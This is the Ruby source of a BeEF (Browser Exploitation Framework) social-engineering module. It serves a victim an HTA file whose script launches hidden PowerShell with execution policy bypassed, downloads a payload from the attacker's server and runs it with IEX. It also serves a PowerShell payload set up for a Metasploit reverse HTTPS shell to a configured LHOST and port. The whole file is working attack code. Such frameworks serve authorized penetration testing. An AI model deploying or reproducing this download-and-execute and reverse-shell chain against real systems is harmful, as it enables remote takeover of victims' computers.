88 lines
3.1 KiB
Ruby
Executable File
88 lines
3.1 KiB
Ruby
Executable File
#
|
|
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
|
|
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
# See the file 'doc/COPYING' for copying permission
|
|
#
|
|
class Hta_powershell < BeEF::Core::Command
|
|
|
|
class Bind_hta < BeEF::Core::Router::Router
|
|
before do
|
|
headers 'Pragma' => 'no-cache',
|
|
'Cache-Control' => 'no-cache',
|
|
'Expires' => '0'
|
|
end
|
|
|
|
get '/' do
|
|
response['Content-Type'] = "application/hta"
|
|
hta_handler = settings.domain + settings.hta_mount_point
|
|
payload_handler = settings.domain + settings.hta_mount_point + settings.ps_mount_point
|
|
print_info "Serving HTA from [#{hta_handler}] and PowerShell payload from [#{payload_handler}]"
|
|
"<script>
|
|
var c = \"cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c \\\"\\\"IEX ((new-object net.webclient).downloadstring('#{payload_handler}')); Invoke-ps\\\"\\\"\";
|
|
new ActiveXObject('WScript.Shell').Run(c);
|
|
</script>"
|
|
end
|
|
|
|
get '/ps' do
|
|
response['Content-Type'] = "text/plain"
|
|
ps_lhost = settings.ps_lhost.to_s
|
|
ps_port = settings.ps_port.to_s
|
|
|
|
ps_payload_path = "#{$root_dir}/modules/social_engineering/hta_powershell/powershell_payload"
|
|
|
|
ps_payload = ''
|
|
if File.exist?(ps_payload_path)
|
|
ps_payload = File.read(ps_payload_path).gsub("___LHOST___", ps_lhost).gsub("___LPORT___", ps_port)
|
|
end
|
|
ps_payload
|
|
end
|
|
end
|
|
|
|
def pre_send
|
|
|
|
# gets the value configured in the module configuration by the user
|
|
@datastore.each do |input|
|
|
if input['name'] == "domain"
|
|
@domain = input['value']
|
|
end
|
|
if input['name'] == "hta_mount_point"
|
|
@hta_mount_point = input['value']
|
|
end
|
|
if input['name'] == "ps_mount_point"
|
|
@ps_mount_point = input['value']
|
|
end
|
|
if input['name'] == "ps_lhost"
|
|
@ps_lhost = input['value']
|
|
end
|
|
if input['name'] == "ps_port"
|
|
@ps_port = input['value']
|
|
end
|
|
end
|
|
|
|
# mount the extension in the BeEF web server, calling a specific nested class (needed because we need a specifi content-type/disposition)
|
|
bind_hta = Hta_powershell::Bind_hta
|
|
bind_hta.set :domain, @domain
|
|
bind_hta.set :ps_mount_point, @ps_mount_point
|
|
bind_hta.set :hta_mount_point, @hta_mount_point
|
|
bind_hta.set :ps_lhost, @ps_lhost
|
|
bind_hta.set :ps_port, @ps_port
|
|
BeEF::Core::Server.instance.mount(@hta_mount_point, bind_hta.new)
|
|
BeEF::Core::Server.instance.remap
|
|
end
|
|
|
|
def self.options
|
|
return [
|
|
{'name' => 'domain', 'ui_label' => 'Serving Domain (for both HTA and PS payload)', 'value' => 'http://beef_domain.com'},
|
|
{'name' => 'hta_mount_point', 'ui_label' => 'HTA Mount point', 'value' => '/hta'},
|
|
{'name' => 'ps_mount_point', 'ui_label' => 'PowerShell Payload Mount point', 'value' => '/ps'},
|
|
{'name' => 'ps_lhost', 'ui_label' => 'MSF Reverse HTTPS LHOST', 'value' => '10.10.10.10'},
|
|
{'name' => 'ps_port', 'ui_label' => 'MSF Reverse HTTPS LPORT', 'value' => '443'}
|
|
]
|
|
end
|
|
|
|
def post_execute
|
|
save({'result' => @datastore['result']})
|
|
end
|
|
|
|
end
|